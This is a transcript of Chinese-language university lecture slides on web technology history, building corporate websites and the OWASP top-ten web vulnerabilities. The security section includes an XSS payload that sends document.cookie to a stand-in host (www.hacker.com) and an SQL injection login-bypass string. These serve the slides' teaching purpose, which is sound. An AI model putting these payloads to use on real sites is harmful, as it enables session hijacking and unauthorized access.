企業網站服務之建置與管理

Download Report

Transcript 企業網站服務之建置與管理

企業網站服務之建置與管理
國立暨南國際大學
資訊管理學系
陳彥錚
大綱
1. WWW技術簡介
2. 企業網站建置
3. WWW安全
1. WWW技術簡介
• (1945)Vannevar Bush發表 “As We May
Think” (Atlantic Monthly)
– 超連結(Hyperlink)
• (Mar. 1989)服務於CERN之Tim BernersLee發表 “Information Management: A
Proposal”
– A client/server model for a distributed hypertext
system
CERN: European Organization for Nuclear Research
WWW技術發展
• (1990) Tim BL撰寫第一個Web 瀏覽器:
– WorldWideWeb
• (Sep. 1993) NCSA發表Mosaic browser.
• (Mar. 1994) Marc Andreessen & Jim Clark 開
設 Mosaic Communications Corp. (後改名
Netscape)
• (Dec. 1994) Netscape發表Netscape Navigator
– 只支援HTML
NCSA: National Center for Supercomputing Applications
HTML and HTTP
Browser
1.
HTTP Request
Web Server
Application
2.
HTTP Response
Web Server
Client PC
HTML Document
• Browser
–
–
–
–
IE (~49%)
Firefox (~43%)
Google Chrome (~3%)
Safari, Opera, …
• Web Server
–
–
–
–
Apache (~50%)
Microsoft IIS (~35%)
Google GWS (~6%)
…
http://en.wikipedia.org/wiki/Usage_share_of_web_browsers
http://www.w3schools.com/browsers/browsers_stats.asp
Downloading a Web Page with Two Graphics
Files
HTML Document
Browser
Client PC
Web Server
Application
Web Server
As
Displayed
2
Graphics
Files
Webpage Consists of Three Files
Rendered as a Single Page On-Screen
http://web2.im.ncnu.edu.tw/ycchen/www/wwwm.html
Downloading a Web Page with Two Graphics
Files
1.
HTML Document
Browser
Client PC
As
Displayed
HTML Document
Web Server
Application
2
Graphics
Files
Web Server
Download Requires 3
HTTP Request-Response Cycles;
Downloads HTML Page First
It has Tags to Identify Other Files
Downloading a Web Page with Two Graphics
Files
2.
Browser
Client PC
As
Displayed
3.
Web Server
Application
2
Graphics
Files
Web Server
WWW技術發展-JavaScript
• (Dec. 1995) Netscape Navigator 2.0支援
JavaScript
– 可於Brower中解譯執行的程式語言
<script>
for (i=0;i<10;i++) {
document.write("<hr size="+2*i+" width=" + 40*i+" color='red'>");
}
alert("Welcome to JavaScript Test!\nSee you!");
</script>
Advantages of Using JavaScript
• Validate user's input.
• Perform aggregrate calculations.
• Easily prompt a user for confirmation, alert, pop-up
information.
• Control of Web browser's behaviors and HTML page
component's properties.
• Conditionalize HTML.
• Perform operations independent of server information.
• Control of Dynamic HTML.
http://web2.im.ncnu.edu.tw/ycchen/www/js/byExample.html
http://web2.im.ncnu.edu.tw/ycchen/www2000/npm.html
Java
• (Jan. 1996) Sun公司發表Java程式語言
– Java應用程式編譯成Bytecode,可在支援JVM
(Java Virtual Machine)之環境執行
• Java Applet
– 可在Web瀏覽器執行的Java小程式
<HTML>
<title>歡迎使用校務自動化系統</title>
<applet codebase="."
code="NCNUTeacherApplet“
archive="www.jar“ width=800 height=450>
</applet>
</HTML>
Cascading Style Sheets (CSS)
• 樣式表 (Stylesheet) 語言
• 提供網頁設定樣式功能,讓網頁能以更精確與結
構化方式顯示網頁版面
<style>
a {text-decoration:none;}
td {background-color:Ivory;}
ul {list-style-image:url(gball.gif);}
h2 {color:white; background-color:black; font-size:1in}
…
</style>
http://www.w3schools.com/css/default.asp
• Dynamic HTML: JavaScript + CSS
http://stdata.im.ncnu.edu.tw/
其他Browser端Web技術
• 瀏覽器之plug-in (附加元件)功能
– Flash (http://web2.im.ncnu.edu.tw/ycchen/doc1/)
– PDF, Windows Media Player, QuickTime, …
• XML (Extensible Markup Language)
<?xml version="1.0" encoding="UTF-8"?>
<department>
<member>
<id type="StuCard">s96211341</id>
<name>Chia-Chia Liu</name>
<email>[email protected]</email>
</member>
</department>
• AJAX: Asynchronous JavaScript and XML
http://www.zdnet.com.tw/news/software/0,2000085678,20145297,00.htm
http://chinese.engadget.com/2010/05/10/opera-hakon-wium-lie-and-von-tetzchner-talk-web/
網頁設計應注意事項
•
•
•
•
兼顧美工與內容
避免使用橫向捲軸
從216種Safety Color 選用顏色
考慮瀏覽器的差異性 (JavaScript, ActiveX,
CSS, …)
• 超連結之正確性
– file:///C:/www/radio.html
– http://192.168.0.1/xx.html
Server端Web技術
• Common Gateway Interface (CGI)
– Web Server 與 Server端應用程式之介面
• Server端Web程式語言
– ASP, JSP, Perl, Php
• Database
– MS SQL Server, MySQL, mSQL, Oracle
Web Content Management System
(CMS)
• Joomla!
– http://www.joomla123.com.tw/
– http://www.classicalvinylrepublic.tw/
• WordPress
• Drupal
• Xoops
2. 企業網站建置
• 網頁(程式)設計
– 靜態網頁、Flash多媒體、動態網頁程式
– 電子商務
• 會員制
• 付款機制: 信用卡、ATM轉帳、貨到付款
• 網站架設
– 自行架設
– 虛擬主機 (Virtual Hosting)
– 主機代管 (Co-Location)
自行架設網站
• 硬體:
– 機櫃式Server、RAID硬碟?、不斷電系統
• 軟體:
– 作業系統、Web 伺服器程式、資料庫
– XAMPP
• 網路:
– IP位址、主機領域名稱
– 對外頻寬
– 網路安全及防火牆
虛擬主機 (Virtual Hosting)
• 由ISP出租架設網站所需之硬體、軟體、網
路服務。
–
–
–
–
–
–
專屬領域名稱及網路位址
磁碟空間
網路頻寬
Server端Web程式語言支援
資料庫
後台管理
主機代管 (Co-Location)
• ISP提供機房與網路,供企業客戶放置自己
的主機與網路設備。
• IDC (Internet Data Center)服務
–
–
–
–
–
機房空間
網路頻寬
提供IP位址
網路管理:流量監測、障礙管理
網路安全: DDoS攻擊、掃毒
3. WWW安全
Web security is important for E-Commerce.
Previous studies:
– SSL
– SET
– Web server security
Application-level security
– Web applications mistakenly trust data returned
from a client.
OWASP
• Open Web Application Security Project (OWASP)
• http://www.owasp.org/index.php/Taiwan
十大Web資安漏洞列表
(2007)
A1.跨站腳本攻擊 (Cross Site Scripting,簡稱XSS)
A2. 注入缺失(Injection Flaw):SQL Injection與Command Injection
A3. 惡意檔案執行(Malicious File Execution)
A4. 不安全的物件參考(Insecure Direct Object Reference)
A5. 跨網站的偽造要求 (Cross-Site Request Forgery,簡稱CSRF)
A6. 資訊揭露與不適當錯誤
A7. 遭破壞的鑑別與連線管理
A8. 不安全的密碼儲存器
A9. 不安全的通訊(Insecure Communication)
A10. 疏於限制URL存取(Failure to Restrict URL Access)
資料來源: OWASP台灣分會
OWASP: Open Web Application Security Project
The Ten Most Critical Web Application Security
Vulnerabilities
1. Unvalidated Parameters
2. Broken Access Control
3. Broken Account and Session Management
4. Cross-Site Scripting (XSS)
5. Buffer Overflows
6. Command Injection Flaws
7. Error Handling Problems
8. Insecure Use of Cryptography
9. Remote Administration Flaws
10. Web and Application Server Misconfiguration
(1). Unvalidated Parameters
• Information from web requests is not validated
before being used by a web application.
• Attackers can use these flaws to attack
background components through a web
application.
(2). Broken Access Control
• Restrictions on what authenticated users are
allowed to do are not properly enforced.
• Attackers can exploit these flaws to access
other users' accounts, view sensitive files, or
use unauthorized functions.
http://www.citibank.com/print.asp?id=u1257
(3). Broken Account and Session
Management
• Account credentials and session tokens are not
properly protected.
• Attackers that can compromise passwords, keys,
session cookies, or other tokens can defeat
authentication restrictions and assume other
users' identities.
(4). Cross-Site Scripting (XSS)
• The web application can be used as a
mechanism to transport an attack to an end
user's browser.
• A successful attack can disclose the end user's
session token, attack the local machine, or
spoof content to fool the user.
XSS Example
~留言版~
<script>
window.location="http://www.hacker.com/steal.cgi?
ck="+document.cookie;
</script>
XSS Web Application Hijack Scenario
www.hacker.com
(5). Buffer Overflows
• Web application components in some
languages that do not properly validate input
can be crashed and, in some cases, used to take
control of a process.
• These components can include CGI, libraries,
drivers, and web application server
components.
(6). Command Injection Flaws
• Web applications pass parameters when they access
external systems or the local operating system.
• If an attacker can embed malicious commands in
these parameters, the external system may execute
those commands on behalf of the web application.
SQL Injection
SQLQuery =
“SELECT  FROM Users WHERE (UserName='” +
strUN + “') AND (Password='” + strPW + “');”
 User name “fredchen”, password “199msq” :
SELECT  FROM Users WHERE (UserName='fredchen')
AND (Password='199msq');
 SQL Injection: User name/Password : ' OR 'A'='A
SELECT  FROM Users WHERE
(UserName='' OR 'A'='A') AND
(Password='' OR 'A'='A');
Input Validation
(7). Error Handling Problems
• Error conditions that occur during normal
operation are not handled properly.
• If an attacker can cause errors to occur that the
web application does not handle, they can gain
detailed system information, deny service,
cause security mechanisms to fail, or crash the
server.
(8). Insecure Use of Cryptography
• Web applications frequently use cryptographic
functions to protect information and credentials.
• These functions and the code to integrate them have
proven difficult to code properly, frequently resulting
in weak protection.
• E.g. MD5(CreditCardNum, RandomNum)
(9). Remote Administration Flaws
• Many web applications allow administrators to access
the site using a web interface.
• If these administrative functions are not very carefully
protected, an attacker can gain full access to all
aspects of a site.
(10). Web and Application Server
Misconfiguration
• Having a strong server configuration standard
is critical to a secure web application.
• These servers have many configuration options
that affect security and are not secure out of the
box.